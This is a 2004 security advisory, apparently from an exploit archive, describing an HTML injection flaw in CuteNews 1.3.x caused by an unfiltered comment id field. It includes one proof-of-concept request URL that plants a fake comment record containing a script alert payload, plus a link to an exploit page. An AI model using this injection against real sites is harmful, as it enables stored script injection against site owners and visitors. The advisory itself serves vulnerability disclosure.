advisory-11.txt

advisory-11.txt: Posted Jul 18, 2004; Authored by DarkBicho | Site darkbicho.tk; CuteNews version 1.3.x suffers from an HTML injection flaw in the commentary section.; tags | advisory; SHA-256 | 1bed2be3a7e3553d352ea8e88aeacbb7a7dc51caa12eba604305e417a1450da1; Download | Favorite | View

advisory-11.txt

original advisory: https://www.darkbicho.iberhosting.net/advisory-11.txt

-------------------------------------------------------------------------------------------------

                            :.: injection html CuteNews  :.: 

  PROGRAM: CuteNews 
  HOMEPAGE: https://cutephp.com/
  VERSION: v1.3.x
  BUG: injection html
  DATE:  15/07/2004
  AUTHOR: DarkBicho
          web: https://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@peru.com

-------------------------------------------------------------------------------------------------


1.- Affected software description:
    -----------------------------

    CuteNews is a popular News Publishing, written in php by
    CutePHP.


2.- vulnerability:
    ---------------

    Injection HTML in commentaries

    /inc/Shows.inc.php

    Line: 189


    if(!$found){ fwrite($new_comments,
    "$id|>|$time|$name|$mail|$ip|$comments||\n"); }

    the variable $id is not filtered


    injection html
   
    id of it the news = 1078525267

    Example:

    show_news.php?subaction=addcomment&name=DarkBich0&comments=https://www.darkbicho.tk&id=1078525267|
    >|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
   
 
    :.: https://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:


3.- Exploit:
    --------

    https://www.darkbicho.iberhosting.net/cutenews/


3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. 
    Check the CuteNews website for updates and official release details. 


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D 
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

  WEB: https://www.darkbicho.tk
  EMAIL: darkbicho@peru.com


-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \_____  \\   \/\/   /|     ___/      
                              /        \\        / |    |        
                             /_______  / \__/\  /  |____|       
                             \/       \/        
                       
                                Security Wari Projects 
                                  (c) 2002 - 2004
                        Made in Peru

----------------------------------------[   EOF  
]----------------------------------------------
 
  
  
DarkBicho  
Web: https://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 57 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,965)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,994)
UNIX (9,476)
UnixWare (188)
Windows (6,784)
Other

advisory-11.txt

advisory-11.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

advisory-11.txt

Share This

advisory-11.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems